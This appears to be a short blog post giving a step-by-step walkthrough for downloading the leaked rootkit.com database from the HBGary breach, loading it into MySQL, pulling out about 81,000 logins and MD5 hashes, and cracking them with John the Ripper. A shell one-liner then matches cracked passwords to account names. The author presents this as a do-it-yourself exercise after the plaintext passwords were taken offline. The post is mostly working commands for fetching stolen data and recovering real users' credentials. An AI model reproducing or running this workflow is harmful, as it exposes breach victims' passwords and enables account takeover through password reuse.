Off the back of the HBGary database walk, a site popped up that published all the clear text passwords. http://dazzlepod.com/rootkit/
Before I had a chance to have a look around, it was down, then came back again without the passwords sighting breach of the hosting service AUP. Meh, do it yourself I says...
Dust off your BT4 distro or whatever and...
1) Download the SQL database from a reputable source.
# wget http://stfu.cc/rootkit_com_mysqlbackup_02_06_11.gz
2) Start mysqld and create a database.
# /etc/init.d/mysqld start
# echo "create database rootkit_com;" |\
mysql --user=root --password=toor
# echo "show databases;" |\
mysql --user=root --password=toor
3) Unzip your download and feed it to mysql.
# gzip -dc rootkit_com_mysqlbackup_02_06_11.gz |\
mysql --user=root --password=toor rootkit_com
# echo "show tables;" |\
mysql --user=root --password=toor rootkit_com
4) Pull out account and password info in a format that JTR can read.
# (cat <<MEH
SELECT login, password
FROM people
INTO OUTFILE '/tmp/rootkitpw.txt'
FIELDS TERMINATED BY ':'
LINES TERMINATED BY '\n'
MEH
) > pullpw.sql
# mysql --user=root --password=toor rootkit_com < pullpw.sql
# wc -l /tmp/rootkitpw.txt
81450 /tmp/rootkitpw.txt
# mv /tmp/rootkitpw.txt /pentest/password/jtr
5) Crank up john the ripper
# cd /pentest/password/jtr
# ./john --format=raw-MD5 rootkitpw.txt
6) Wait a little while and check some of the progress out... (script outputs hash, password & account)
# (IFS=:; printf "%-34s %-15s %s\n" "raw-MD5" "Password" "Account"; printf "%-34s %-15s %s\n" "-------" "--------" "-------"; cat john.pot | while read HASH PASS; do grep ${HASH} rootkit-pwd.txt | while read ACCT FOOHASH; do printf "%-34s %-15s %s\n" ${HASH} ${PASS} ${ACCT};done ; done) | less
7) If you interested in confirming the password, compare the hash...
# echo -e "test\c" | md5sum
098f6bcd4621d373cade4e832627b4f6 -
exit 0
Subscribe to:
Posts (Atom)